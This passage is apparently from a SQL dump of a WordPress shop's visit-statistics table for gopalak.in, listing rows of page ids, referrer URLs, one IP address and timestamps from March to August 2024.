18:20:53'),(2454,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-03-14 14:02:52'),(2455,1,0,0,0,1,'http://www.google.com.hk','3.110.242.160','','','','2024-03-14 22:14:07'),(2456,1,0,0,0,1,'','3.110.242.160','','','','2024-03-18 02:30:19'),(2457,9,0,0,85,1,'','3.110.242.160','','','','2024-03-18 02:30:22'),(2458,0,0,1,1786,1,'','3.110.242.160','','','','2024-03-18 02:30:23'),(2459,1,0,0,0,1,'','3.110.242.160','','','','2024-03-18 02:30:29'),(2460,9,0,0,135,1,'','3.110.242.160','','','','2024-03-18 02:30:30'),(2461,9,0,0,135,1,'','3.110.242.160','','','','2024-03-18 02:30:33'),(2462,0,0,1,1775,1,'','3.110.242.160','','','','2024-03-18 02:30:36'),(2463,1,0,0,0,1,'','3.110.242.160','','','','2024-03-18 02:30:39'),(2464,9,0,0,136,1,'','3.110.242.160','','','','2024-03-18 02:30:42'),(2465,9,0,0,136,1,'','3.110.242.160','','','','2024-03-18 02:30:45'),(2466,9,0,0,136,1,'','3.110.242.160','','','','2024-03-18 02:30:46'),(2467,0,0,1,1755,1,'','3.110.242.160','','','','2024-03-18 02:30:49'),(2468,0,0,1,1755,1,'','3.110.242.160','','','','2024-03-18 02:30:52'),(2469,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-03-22 12:02:07'),(2470,9,0,0,135,1,'','3.110.242.160','','','','2024-03-23 02:26:28'),(2471,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-03-23 04:20:22'),(2472,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-03-23 20:34:45'),(2473,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-03-24 17:16:00'),(2474,9,0,0,136,1,'','3.110.242.160','','','','2024-03-24 17:46:39'),(2475,9,0,0,135,1,'','3.110.242.160','','','','2024-03-24 17:50:01'),(2476,9,0,0,85,1,'','3.110.242.160','','','','2024-03-24 17:54:16'),(2477,0,0,1,1775,1,'','3.110.242.160','','','','2024-03-24 17:57:27'),(2478,0,0,1,1786,1,'','3.110.242.160','','','','2024-03-24 17:58:54'),(2479,0,0,1,1755,1,'','3.110.242.160','','','','2024-03-24 18:00:50'),(2480,0,0,1,1755,1,'http://gopalak.in/product/cow/?add-to-cart=1775','3.110.242.160','','','','2024-03-24 20:26:55'),(2481,9,0,0,136,1,'http://gopalak.in/product-category/donation/?add-to-cart=1755','3.110.242.160','','','','2024-03-25 05:32:17'),(2482,9,0,0,85,1,'http://gopalak.in/product-tag/pre-order/#content','3.110.242.160','','','','2024-03-25 08:18:08'),(2483,1,0,0,0,1,'http://gopalak.in/shop/?add-to-cart=1755','3.110.242.160','','','','2024-03-25 14:38:25'),(2484,0,0,1,1755,1,'http://gopalak.in/product/cow/?add-to-cart=1775','3.110.242.160','','','','2024-03-26 13:53:07'),(2485,0,0,1,1755,1,'http://gopalak.in/product/cow/?add-to-cart=1775','3.110.242.160','','','','2024-03-27 20:29:32'),(2486,1,0,0,0,1,'','3.110.242.160','','','','2024-03-29 11:12:26'),(2487,0,0,1,1775,1,'http://gopalak.in/product/abc/?add-to-cart=1755','3.110.242.160','','','','2024-03-31 05:14:43'),(2488,1,0,0,0,1,'http://www.google.com.hk','3.110.242.160','','','','2024-04-01 08:09:33'),(2489,0,0,1,1755,1,'http://gopalak.in/product/cow/?add-to-cart=1775','3.110.242.160','','','','2024-04-01 09:56:57'),(2490,0,0,1,1775,1,'http://gopalak.in/product/abc/?add-to-cart=1755','3.110.242.160','','','','2024-04-02 08:46:12'),(2491,0,0,1,1775,1,'http://gopalak.in/product/abc/?add-to-cart=1755','3.110.242.160','','','','2024-04-02 18:07:48'),(2492,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2024-04-05 09:29:23'),(2493,0,0,1,1775,1,'http://gopalak.in/product/abc/?add-to-cart=1755','3.110.242.160','','','','2024-04-06 02:24:33'),(2494,9,0,0,136,1,'','3.110.242.160','','','','2024-04-06 04:44:12'),(2495,9,0,0,135,1,'','3.110.242.160','','','','2024-04-06 04:46:21'),(2496,9,0,0,85,1,'','3.110.242.160','','','','2024-04-06 04:48:06'),(2497,0,0,1,1775,1,'','3.110.242.160','','','','2024-04-06 04:49:45'),(2498,0,0,1,1786,1,'','3.110.242.160','','','','2024-04-06 04:52:36'),(2499,0,0,1,1755,1,'','3.110.242.160','','','','2024-04-06 04:55:10'),(2500,1,0,0,0,1,'','3.110.242.160','','','','2024-04-06 04:58:18'),(2501,0,0,1,1775,1,'http://gopalak.in/product/abc/?add-to-cart=1755','3.110.242.160','','','','2024-04-07 00:13:22'),(2502,9,0,0,136,1,'','3.110.242.160','','','','2024-04-07 02:29:35'),(2503,0,0,1,1755,1,'http://gopalak.in/product/cow/?add-to-cart=1775','3.110.242.160','','','','2024-04-08 11:14:44'),(2504,0,0,1,1755,1,'http://gopalak.in/product/cow/?add-to-cart=1775','3.110.242.160','','','','2024-04-09 01:55:34'),(2505,9,0,0,136,1,'','3.110.242.160','','','','2024-04-10 09:22:57'),(2506,9,0,0,135,1,'','3.110.242.160','','','','2024-04-10 09:24:58'),(2507,9,0,0,85,1,'','3.110.242.160','','','','2024-04-10 09:26:53'),(2508,0,0,1,1775,1,'','3.110.242.160','','','','2024-04-10 09:28:53'),(2509,0,0,1,1786,1,'','3.110.242.160','','','','2024-04-10 09:31:10'),(2510,0,0,1,1755,1,'','3.110.242.160','','','','2024-04-10 09:33:07'),(2511,1,0,0,0,1,'','3.110.242.160','','','','2024-04-10 09:37:11'),(2512,0,0,1,1775,1,'','3.110.242.160','','','','2024-04-12 11:08:24'),(2513,0,0,1,1755,1,'http://gopalak.in/product/cow/?add-to-cart=1775','3.110.242.160','','','','2024-04-12 23:03:12'),(2514,0,0,1,1775,1,'http://gopalak.in/product/abc/?add-to-cart=1755','3.110.242.160','','','','2024-04-14 17:20:15'),(2515,0,0,1,1775,1,'http://gopalak.in/product/abc/?add-to-cart=1755','3.110.242.160','','','','2024-04-15 23:38:20'),(2516,1,0,0,0,1,'http://gopalak.in/shop/#content?add-to-cart=1775','3.110.242.160','','','','2024-04-16 16:32:29'),(2517,1,0,0,0,1,'','3.110.242.160','','','','2024-04-17 19:23:29'),(2518,1,0,0,0,1,'','3.110.242.160','','','','2024-04-18 02:43:32'),(2519,1,0,0,0,1,'','3.110.242.160','','','','2024-04-18 07:18:41'),(2520,9,0,0,136,1,'','3.110.242.160','','','','2024-04-19 10:04:12'),(2521,9,0,0,136,1,'','3.110.242.160','','','','2024-04-19 12:25:37'),(2522,1,0,0,0,1,'','3.110.242.160','','','','2024-04-19 14:57:09'),(2523,0,0,1,1755,1,'','3.110.242.160','','','','2024-04-20 06:32:54'),(2524,9,0,0,136,1,'','3.110.242.160','','','','2024-04-20 11:08:00'),(2525,9,0,0,136,1,'','3.110.242.160','','','','2024-04-20 22:30:57'),(2526,0,0,1,1775,1,'','3.110.242.160','','','','2024-04-21 13:20:44'),(2527,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-04-21 16:06:24'),(2528,0,0,1,1755,1,'','3.110.242.160','','','','2024-04-22 01:59:07'),(2529,9,0,0,136,1,'','3.110.242.160','','','','2024-04-22 15:55:08'),(2530,0,0,1,1755,1,'','3.110.242.160','','','','2024-04-23 10:00:05'),(2531,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-04-23 20:14:29'),(2532,1,0,0,0,1,'','3.110.242.160','','','','2024-04-23 23:45:04'),(2533,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-04-24 15:24:01'),(2534,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-04-25 00:02:25'),(2535,9,0,0,136,1,'','3.110.242.160','','','','2024-04-25 09:16:57'),(2536,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-04-25 16:12:00'),(2537,0,0,1,1755,1,'','3.110.242.160','','','','2024-04-26 05:17:07'),(2538,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-04-26 05:57:17'),(2539,9,0,0,136,1,'','3.110.242.160','','','','2024-04-26 16:34:40'),(2540,0,0,1,1775,1,'','3.110.242.160','','','','2024-04-26 17:20:41'),(2541,0,0,1,1775,1,'','3.110.242.160','','','','2024-04-28 04:36:03'),(2542,9,0,0,136,1,'','3.110.242.160','','','','2024-04-29 12:20:59'),(2543,1,0,0,0,1,'','3.110.242.160','','','','2024-04-30 00:31:43'),(2544,0,0,1,1775,1,'','3.110.242.160','','','','2024-04-30 07:08:29'),(2545,9,0,0,136,1,'','3.110.242.160','','','','2024-05-01 04:09:44'),(2546,0,0,1,1755,1,'','3.110.242.160','','','','2024-05-01 04:14:03'),(2547,0,0,1,1775,1,'','3.110.242.160','','','','2024-05-02 05:18:06'),(2548,1,0,0,0,1,'','3.110.242.160','','','','2024-05-02 14:29:14'),(2549,0,0,1,1755,1,'','3.110.242.160','','','','2024-05-02 19:08:26'),(2550,0,0,1,1775,1,'','3.110.242.160','','','','2024-05-02 19:34:38'),(2551,1,0,0,0,1,'','3.110.242.160','','','','2024-05-03 04:36:20'),(2552,1,0,0,0,1,'','3.110.242.160','','','','2024-05-04 01:56:49'),(2553,1,0,0,0,1,'','3.110.242.160','','','','2024-05-04 12:53:04'),(2554,0,0,1,1775,1,'','3.110.242.160','','','','2024-05-04 15:21:15'),(2555,0,0,1,1755,1,'','3.110.242.160','','','','2024-05-05 07:34:07'),(2556,0,0,1,1775,1,'','3.110.242.160','','','','2024-05-05 14:40:08'),(2557,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2024-05-06 10:34:54'),(2558,0,0,1,1755,1,'','3.110.242.160','','','','2024-05-06 15:49:27'),(2559,1,0,0,0,1,'','3.110.242.160','','','','2024-05-07 10:19:51'),(2560,0,0,1,1755,1,'','3.110.242.160','','','','2024-05-07 19:53:56'),(2561,1,0,0,0,1,'','3.110.242.160','','','','2024-05-08 01:42:41'),(2562,0,0,1,1775,1,'','3.110.242.160','','','','2024-05-08 16:53:12'),(2563,0,0,1,1775,1,'','3.110.242.160','','','','2024-05-09 21:27:34'),(2564,9,0,0,136,1,'','3.110.242.160','','','','2024-05-09 22:00:54'),(2565,1,0,0,0,1,'','3.110.242.160','','','','2024-05-10 14:30:10'),(2566,1,0,0,0,1,'','3.110.242.160','','','','2024-05-10 14:30:15'),(2567,1,0,0,0,1,'','3.110.242.160','','','','2024-05-10 22:48:00'),(2568,1,0,0,0,1,'','3.110.242.160','','','','2024-05-11 01:08:31'),(2569,1,0,0,0,1,'','3.110.242.160','','','','2024-05-11 06:16:32'),(2570,0,0,1,1775,1,'','3.110.242.160','','','','2024-05-11 11:17:40'),(2571,0,0,1,1775,1,'','3.110.242.160','','','','2024-05-11 12:52:29'),(2572,0,0,1,1775,1,'','3.110.242.160','','','','2024-05-11 23:42:51'),(2573,1,0,0,0,1,'','3.110.242.160','','','','2024-05-12 02:58:32'),(2574,1,0,0,0,1,'','3.110.242.160','','','','2024-05-12 02:58:36'),(2575,1,0,0,0,1,'','3.110.242.160','','','','2024-05-12 02:58:36'),(2576,1,0,0,0,1,'','3.110.242.160','','','','2024-05-12 02:58:37'),(2577,0,0,1,1755,1,'','3.110.242.160','','','','2024-05-12 03:25:38'),(2578,1,0,0,0,1,'','3.110.242.160','','','','2024-05-13 10:17:25'),(2579,9,0,0,136,1,'','3.110.242.160','','','','2024-05-13 14:40:46'),(2580,0,0,1,1775,1,'','3.110.242.160','','','','2024-05-14 06:35:01'),(2581,0,0,1,1755,1,'','3.110.242.160','','','','2024-05-14 10:22:16'),(2582,0,0,1,1755,1,'','3.110.242.160','','','','2024-05-14 20:18:37'),(2583,1,0,0,0,1,'https://www.google.com/','3.110.242.160','','','','2024-05-15 11:13:30'),(2584,0,0,1,1755,1,'','3.110.242.160','','','','2024-05-15 13:48:02'),(2585,0,0,1,1775,1,'','3.110.242.160','','','','2024-05-15 16:51:51'),(2586,1,0,0,0,1,'','3.110.242.160','','','','2024-05-16 09:51:09'),(2587,9,0,0,135,1,'','3.110.242.160','','','','2024-05-16 18:54:27'),(2588,1,0,0,0,1,'','3.110.242.160','','','','2024-05-17 13:36:40'),(2589,0,0,1,1775,1,'','3.110.242.160','','','','2024-05-18 14:42:06'),(2590,0,0,1,1775,1,'','3.110.242.160','','','','2024-05-19 11:46:41'),(2591,0,0,1,1775,1,'','3.110.242.160','','','','2024-05-21 02:32:59'),(2592,0,0,1,1755,1,'','3.110.242.160','','','','2024-05-21 11:40:03'),(2593,0,0,1,1755,1,'','3.110.242.160','','','','2024-05-22 01:57:50'),(2594,1,0,0,0,1,'','3.110.242.160','','','','2024-05-22 12:48:37'),(2595,0,0,1,1775,1,'','3.110.242.160','','','','2024-05-22 12:54:04'),(2596,1,0,0,0,1,'','3.110.242.160','','','','2024-05-23 17:04:41'),(2597,1,0,0,0,1,'','3.110.242.160','','','','2024-05-24 01:11:54'),(2598,1,0,0,0,1,'','3.110.242.160','','','','2024-05-24 09:54:31'),(2599,1,0,0,0,1,'','3.110.242.160','','','','2024-05-24 20:47:04'),(2600,1,0,0,0,1,'','3.110.242.160','','','','2024-05-25 07:26:52'),(2601,1,0,0,0,1,'','3.110.242.160','','','','2024-05-25 23:51:40'),(2602,9,0,0,136,1,'','3.110.242.160','','','','2024-05-26 06:13:43'),(2603,0,0,1,1775,1,'','3.110.242.160','','','','2024-05-26 10:22:47'),(2604,0,0,1,1775,1,'','3.110.242.160','','','','2024-05-26 19:51:05'),(2605,1,0,0,0,1,'','3.110.242.160','','','','2024-05-26 23:12:30'),(2606,1,0,0,0,1,'','3.110.242.160','','','','2024-05-27 14:42:48'),(2607,0,0,1,1775,1,'','3.110.242.160','','','','2024-05-28 13:41:43'),(2608,0,0,1,1775,1,'','3.110.242.160','','','','2024-05-28 18:52:47'),(2609,1,0,0,0,1,'','3.110.242.160','','','','2024-05-28 23:23:14'),(2610,1,0,0,0,1,'','3.110.242.160','','','','2024-05-28 23:23:19'),(2611,1,0,0,0,1,'','3.110.242.160','','','','2024-05-28 23:23:21'),(2612,9,0,0,136,1,'','3.110.242.160','','','','2024-05-29 02:14:24'),(2613,1,0,0,0,1,'','3.110.242.160','','','','2024-05-29 03:55:27'),(2614,9,0,0,136,1,'','3.110.242.160','','','','2024-05-30 09:29:44'),(2615,1,0,0,0,1,'','3.110.242.160','','','','2024-05-30 12:01:34'),(2616,1,0,0,0,1,'','3.110.242.160','','','','2024-05-31 09:58:56'),(2617,0,0,1,1755,1,'','3.110.242.160','','','','2024-05-31 14:45:41'),(2618,9,0,0,136,1,'','3.110.242.160','','','','2024-05-31 23:44:16'),(2619,1,0,0,0,1,'','3.110.242.160','','','','2024-06-01 04:29:58'),(2620,9,0,0,136,1,'','3.110.242.160','','','','2024-06-01 18:52:33'),(2621,9,0,0,135,1,'','3.110.242.160','','','','2024-06-02 16:59:02'),(2622,9,0,0,135,1,'','3.110.242.160','','','','2024-06-03 03:26:26'),(2623,0,0,1,1755,1,'','3.110.242.160','','','','2024-06-03 03:39:57'),(2624,1,0,0,0,1,'','3.110.242.160','','','','2024-06-03 13:02:33'),(2625,1,0,0,0,1,'','3.110.242.160','','','','2024-06-03 17:45:40'),(2626,1,0,0,0,1,'http://www.google.com.hk','3.110.242.160','','','','2024-06-04 02:44:47'),(2627,9,0,0,136,1,'','3.110.242.160','','','','2024-06-04 07:48:46'),(2628,1,0,0,0,1,'','3.110.242.160','','','','2024-06-05 16:56:40'),(2629,9,0,0,136,1,'','3.110.242.160','','','','2024-06-06 06:56:09'),(2630,1,0,0,0,1,'','3.110.242.160','','','','2024-06-06 19:50:48'),(2631,1,0,0,0,1,'','3.110.242.160','','','','2024-06-07 09:37:11'),(2632,9,0,0,136,1,'','3.110.242.160','','','','2024-06-07 16:07:39'),(2633,1,0,0,0,1,'','3.110.242.160','','','','2024-06-08 04:50:04'),(2634,1,0,0,0,1,'','3.110.242.160','','','','2024-06-08 04:50:26'),(2635,1,0,0,0,1,'','3.110.242.160','','','','2024-06-08 09:11:25'),(2636,1,0,0,0,1,'','3.110.242.160','','','','2024-06-08 17:36:25'),(2637,9,0,0,136,1,'','3.110.242.160','','','','2024-06-09 10:05:01'),(2638,1,0,0,0,1,'','3.110.242.160','','','','2024-06-09 17:53:25'),(2639,9,0,0,85,1,'','3.110.242.160','','','','2024-06-10 15:48:12'),(2640,9,0,0,136,1,'','3.110.242.160','','','','2024-06-11 06:56:22'),(2641,9,0,0,136,1,'','3.110.242.160','','','','2024-06-11 10:53:12'),(2642,0,0,1,1775,1,'','3.110.242.160','','','','2024-06-12 04:09:46'),(2643,0,0,1,1755,1,'','3.110.242.160','','','','2024-06-12 04:54:26'),(2644,9,0,0,135,1,'','3.110.242.160','','','','2024-06-12 05:01:17'),(2645,0,0,1,1786,1,'','3.110.242.160','','','','2024-06-12 06:19:56'),(2646,9,0,0,136,1,'','3.110.242.160','','','','2024-06-12 09:07:11'),(2647,0,0,1,1775,1,'','3.110.242.160','','','','2024-06-13 15:25:21'),(2648,9,0,0,136,1,'','3.110.242.160','','','','2024-06-14 03:59:38'),(2649,0,0,1,1775,1,'','3.110.242.160','','','','2024-06-14 05:13:07'),(2650,1,0,0,0,1,'http://www.google.com.hk','3.110.242.160','','','','2024-06-14 13:38:56'),(2651,0,0,1,1775,1,'','3.110.242.160','','','','2024-06-14 18:30:14'),(2652,0,0,1,1755,1,'','3.110.242.160','','','','2024-06-15 04:38:04'),(2653,1,0,0,0,1,'','3.110.242.160','','','','2024-06-15 09:47:47'),(2654,1,0,0,0,1,'','3.110.242.160','','','','2024-06-15 19:47:15'),(2655,1,0,0,0,1,'','3.110.242.160','','','','2024-06-15 19:55:47'),(2656,1,0,0,0,1,'','3.110.242.160','','','','2024-06-15 19:55:53'),(2657,0,0,1,1755,1,'','3.110.242.160','','','','2024-06-16 04:06:31'),(2658,1,0,0,0,1,'','3.110.242.160','','','','2024-06-17 23:38:02'),(2659,1,0,0,0,1,'','3.110.242.160','','','','2024-06-17 23:38:07'),(2660,1,0,0,0,1,'','3.110.242.160','','','','2024-06-18 20:08:33'),(2661,1,0,0,0,1,'','3.110.242.160','','','','2024-06-19 09:16:27'),(2662,0,0,1,1755,1,'','3.110.242.160','','','','2024-06-19 11:38:35'),(2663,9,0,0,135,1,'','3.110.242.160','','','','2024-06-19 12:43:02'),(2664,1,0,0,0,1,'','3.110.242.160','','','','2024-06-20 18:41:21'),(2665,0,0,1,1775,1,'','3.110.242.160','','','','2024-06-21 01:11:28'),(2666,0,0,1,1755,1,'','3.110.242.160','','','','2024-06-21 05:46:38'),(2667,1,0,0,0,1,'','3.110.242.160','','','','2024-06-21 11:58:50'),(2668,0,0,1,1786,1,'','3.110.242.160','','','','2024-06-21 14:58:50'),(2669,1,0,0,0,1,'','3.110.242.160','','','','2024-06-23 12:25:04'),(2670,9,0,0,135,1,'','3.110.242.160','','','','2024-06-24 02:46:27'),(2671,1,0,0,0,1,'','3.110.242.160','','','','2024-06-25 02:55:35'),(2672,9,0,0,136,1,'','3.110.242.160','','','','2024-06-25 14:19:24'),(2673,0,0,1,1775,1,'','3.110.242.160','','','','2024-06-26 23:04:55'),(2674,0,0,1,1775,1,'','3.110.242.160','','','','2024-06-27 09:21:18'),(2675,9,0,0,85,1,'','3.110.242.160','','','','2024-06-27 22:35:48'),(2676,0,0,1,1786,1,'','3.110.242.160','','','','2024-06-27 22:35:51'),(2677,9,0,0,136,1,'','3.110.242.160','','','','2024-06-27 22:35:54'),(2678,9,0,0,136,1,'','3.110.242.160','','','','2024-06-27 22:36:00'),(2679,1,0,0,0,1,'','3.110.242.160','','','','2024-06-27 22:36:01'),(2680,9,0,0,135,1,'','3.110.242.160','','','','2024-06-27 22:36:03'),(2681,1,0,0,0,1,'','3.110.242.160','','','','2024-06-27 22:36:04'),(2682,9,0,0,135,1,'','3.110.242.160','','','','2024-06-27 22:36:06'),(2683,0,0,1,1775,1,'','3.110.242.160','','','','2024-06-27 22:36:10'),(2684,1,0,0,0,1,'','3.110.242.160','','','','2024-06-27 22:36:13'),(2685,9,0,0,136,1,'','3.110.242.160','','','','2024-06-27 22:36:15'),(2686,0,0,1,1755,1,'','3.110.242.160','','','','2024-06-27 22:36:22'),(2687,0,0,1,1755,1,'','3.110.242.160','','','','2024-06-28 18:45:05'),(2688,1,0,0,0,1,'','3.110.242.160','','','','2024-06-29 14:43:59'),(2689,1,0,0,0,1,'','3.110.242.160','','','','2024-06-29 14:44:04'),(2690,1,0,0,0,1,'','3.110.242.160','','','','2024-06-29 14:44:06'),(2691,1,0,0,0,1,'','3.110.242.160','','','','2024-06-29 19:48:01'),(2692,1,0,0,0,1,'','3.110.242.160','','','','2024-06-30 01:36:50'),(2693,9,0,0,136,1,'','3.110.242.160','','','','2024-06-30 14:35:36'),(2694,0,0,1,1775,1,'','3.110.242.160','','','','2024-06-30 15:57:09'),(2695,1,0,0,0,1,'','3.110.242.160','','','','2024-07-01 01:42:49'),(2696,9,0,0,135,1,'','3.110.242.160','','','','2024-07-01 09:31:09'),(2697,9,0,0,136,1,'','3.110.242.160','','','','2024-07-01 11:39:39'),(2698,9,0,0,85,1,'','3.110.242.160','','','','2024-07-01 11:59:49'),(2699,1,0,0,0,1,'','3.110.242.160','','','','2024-07-02 12:29:22'),(2700,1,0,0,0,1,'','3.110.242.160','','','','2024-07-03 17:49:11'),(2701,1,0,0,0,1,'','3.110.242.160','','','','2024-07-03 23:37:35'),(2702,0,0,1,1755,1,'','3.110.242.160','','','','2024-07-03 23:57:40'),(2703,1,0,0,0,1,'','3.110.242.160','','','','2024-07-04 19:30:56'),(2704,1,0,0,0,1,'','3.110.242.160','','','','2024-07-04 21:50:10'),(2705,9,0,0,136,1,'','3.110.242.160','','','','2024-07-05 12:54:46'),(2706,0,0,1,1786,1,'','3.110.242.160','','','','2024-07-05 13:21:21'),(2707,1,0,0,0,1,'','3.110.242.160','','','','2024-07-05 22:15:54'),(2708,1,0,0,0,1,'','3.110.242.160','','','','2024-07-06 13:33:21'),(2709,9,0,0,136,1,'','3.110.242.160','','','','2024-07-06 17:30:53'),(2710,1,0,0,0,1,'','3.110.242.160','','','','2024-07-08 15:47:56'),(2711,9,0,0,135,1,'','3.110.242.160','','','','2024-07-08 18:48:25'),(2712,0,0,1,1786,1,'','3.110.242.160','','','','2024-07-08 18:48:34'),(2713,1,0,0,0,1,'','3.110.242.160','','','','2024-07-08 18:48:44'),(2714,9,0,0,136,1,'','3.110.242.160','','','','2024-07-09 09:45:24'),(2715,1,0,0,0,1,'','3.110.242.160','','','','2024-07-09 22:01:26'),(2716,1,0,0,0,1,'','3.110.242.160','','','','2024-07-09 22:01:28'),(2717,1,0,0,0,1,'','3.110.242.160','','','','2024-07-09 22:01:30'),(2718,0,0,1,1755,1,'','3.110.242.160','','','','2024-07-09 22:03:45'),(2719,9,0,0,135,1,'','3.110.242.160','','','','2024-07-09 22:03:51'),(2720,0,0,1,1775,1,'','3.110.242.160','','','','2024-07-09 22:03:58'),(2721,9,0,0,85,1,'','3.110.242.160','','','','2024-07-09 22:08:33'),(2722,9,0,0,136,1,'','3.110.242.160','','','','2024-07-09 22:11:29'),(2723,9,0,0,135,1,'','3.110.242.160','','','','2024-07-09 22:48:06'),(2724,9,0,0,135,1,'','3.110.242.160','','','','2024-07-09 23:25:48'),(2725,9,0,0,135,1,'','3.110.242.160','','','','2024-07-10 03:31:23'),(2726,0,0,1,1786,1,'','3.110.242.160','','','','2024-07-10 03:31:27'),(2727,1,0,0,0,1,'','3.110.242.160','','','','2024-07-10 03:31:46'),(2728,1,0,0,0,1,'','3.110.242.160','','','','2024-07-10 06:12:55'),(2729,1,0,0,0,1,'','3.110.242.160','','','','2024-07-10 06:12:57'),(2730,1,0,0,0,1,'','3.110.242.160','','','','2024-07-10 06:13:00'),(2731,9,0,0,135,1,'','3.110.242.160','','','','2024-07-10 06:15:27'),(2732,0,0,1,1755,1,'','3.110.242.160','','','','2024-07-10 06:15:27'),(2733,0,0,1,1775,1,'','3.110.242.160','','','','2024-07-10 06:15:35'),(2734,9,0,0,85,1,'','3.110.242.160','','','','2024-07-10 06:21:53'),(2735,9,0,0,136,1,'','3.110.242.160','','','','2024-07-10 06:24:51'),(2736,1,0,0,0,1,'','3.110.242.160','','','','2024-07-10 15:17:39'),(2737,1,0,0,0,1,'','3.110.242.160','','','','2024-07-10 23:25:35'),(2738,9,0,0,136,1,'','3.110.242.160','','','','2024-07-11 07:04:27'),(2739,9,0,0,136,1,'','3.110.242.160','','','','2024-07-11 07:04:36'),(2740,0,0,1,1775,1,'','3.110.242.160','','','','2024-07-11 07:07:56'),(2741,9,0,0,135,1,'','3.110.242.160','','','','2024-07-11 07:08:24'),(2742,0,0,1,1755,1,'','3.110.242.160','','','','2024-07-11 07:09:50'),(2743,0,0,1,1786,1,'','3.110.242.160','','','','2024-07-11 07:13:17'),(2744,1,0,0,0,1,'','3.110.242.160','','','','2024-07-11 07:13:43'),(2745,1,0,0,0,1,'','3.110.242.160','','','','2024-07-11 07:13:47'),(2746,0,0,1,1755,1,'','3.110.242.160','','','','2024-07-11 07:13:58'),(2747,0,0,1,1775,1,'','3.110.242.160','','','','2024-07-11 07:14:01'),(2748,1,0,0,0,1,'','3.110.242.160','','','','2024-07-11 07:14:02'),(2749,9,0,0,85,1,'','3.110.242.160','','','','2024-07-11 07:18:46'),(2750,9,0,0,135,1,'','3.110.242.160','','','','2024-07-11 07:21:09'),(2751,1,0,0,0,1,'','3.110.242.160','','','','2024-07-11 07:21:52'),(2752,9,0,0,136,1,'','3.110.242.160','','','','2024-07-11 07:22:07'),(2753,1,0,0,0,1,'','3.110.242.160','','','','2024-07-11 12:27:39'),(2754,1,0,0,0,1,'','3.110.242.160','','','','2024-07-11 12:27:41'),(2755,9,0,0,85,1,'','3.110.242.160','','','','2024-07-11 12:31:47'),(2756,0,0,1,1775,1,'','3.110.242.160','','','','2024-07-11 12:31:59'),(2757,1,0,0,0,1,'','3.110.242.160','','','','2024-07-11 12:32:18'),(2758,9,0,0,136,1,'','3.110.242.160','','','','2024-07-11 12:32:33'),(2759,9,0,0,136,1,'','3.110.242.160','','','','2024-07-11 12:34:28'),(2760,0,0,1,1786,1,'','3.110.242.160','','','','2024-07-11 12:34:43'),(2761,0,0,1,1755,1,'','3.110.242.160','','','','2024-07-11 12:36:01'),(2762,9,0,0,135,1,'','3.110.242.160','','','','2024-07-11 12:36:58'),(2763,1,0,0,0,1,'','3.110.242.160','','','','2024-07-12 14:00:57'),(2764,1,0,0,0,1,'','3.110.242.160','','','','2024-07-14 11:26:28'),(2765,1,0,0,0,1,'','3.110.242.160','','','','2024-07-14 17:42:57'),(2766,0,0,1,1775,1,'','3.110.242.160','','','','2024-07-15 00:35:26'),(2767,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2024-07-16 08:35:38'),(2768,0,0,1,1755,1,'','3.110.242.160','','','','2024-07-16 11:27:06'),(2769,0,0,1,1786,1,'','3.110.242.160','','','','2024-07-16 11:32:11'),(2770,1,0,0,0,1,'','3.110.242.160','','','','2024-07-17 05:37:20'),(2771,1,0,0,0,1,'','3.110.242.160','','','','2024-07-17 05:37:27'),(2772,1,0,0,0,1,'','3.110.242.160','','','','2024-07-17 13:45:24'),(2773,1,0,0,0,1,'','3.110.242.160','','','','2024-07-18 17:55:32'),(2774,1,0,0,0,1,'','3.110.242.160','','','','2024-07-19 09:35:29'),(2775,0,0,1,1775,1,'','3.110.242.160','','','','2024-07-19 15:07:41'),(2776,1,0,0,0,1,'http://gopalak.in/','3.110.242.160','','','','2024-07-20 06:56:44'),(2777,1,0,0,0,1,'http://gopalak.in/','3.110.242.160','','','','2024-07-20 06:56:45'),(2778,9,0,0,135,1,'','3.110.242.160','','','','2024-07-21 00:08:51'),(2779,1,0,0,0,1,'','3.110.242.160','','','','2024-07-22 11:44:24'),(2780,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2024-07-23 08:07:35'),(2781,1,0,0,0,1,'','3.110.242.160','','','','2024-07-24 09:57:15'),(2782,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2024-07-24 14:18:42'),(2783,9,0,0,85,1,'','3.110.242.160','','','','2024-07-24 20:23:43'),(2784,1,0,0,0,1,'','3.110.242.160','','','','2024-07-24 20:26:24'),(2785,9,0,0,135,1,'','3.110.242.160','','','','2024-07-24 21:13:39'),(2786,0,0,1,1755,1,'','3.110.242.160','','','','2024-07-25 01:25:15'),(2787,0,0,1,1786,1,'','3.110.242.160','','','','2024-07-25 02:07:34'),(2788,9,0,0,136,1,'','3.110.242.160','','','','2024-07-25 03:02:14'),(2789,0,0,1,1775,1,'','3.110.242.160','','','','2024-07-25 04:39:56'),(2790,1,0,0,0,1,'','3.110.242.160','','','','2024-07-25 11:39:22'),(2791,9,0,0,85,1,'','3.110.242.160','','','','2024-07-27 03:31:28'),(2792,1,0,0,0,1,'','3.110.242.160','','','','2024-07-27 07:05:22'),(2793,9,0,0,135,1,'','3.110.242.160','','','','2024-07-29 12:53:33'),(2794,1,0,0,0,1,'','3.110.242.160','','','','2024-07-29 17:55:24'),(2795,1,0,0,0,1,'','3.110.242.160','','','','2024-07-30 02:53:02'),(2796,1,0,0,0,1,'','3.110.242.160','','','','2024-07-31 01:29:13'),(2797,1,0,0,0,1,'','3.110.242.160','','','','2024-08-01 16:06:26'),(2798,1,0,0,0,1,'','3.110.242.160','','','','2024-08-02 05:00:16'),(2799,0,0,1,1786,1,'','3.110.242.160','','','','2024-08-02 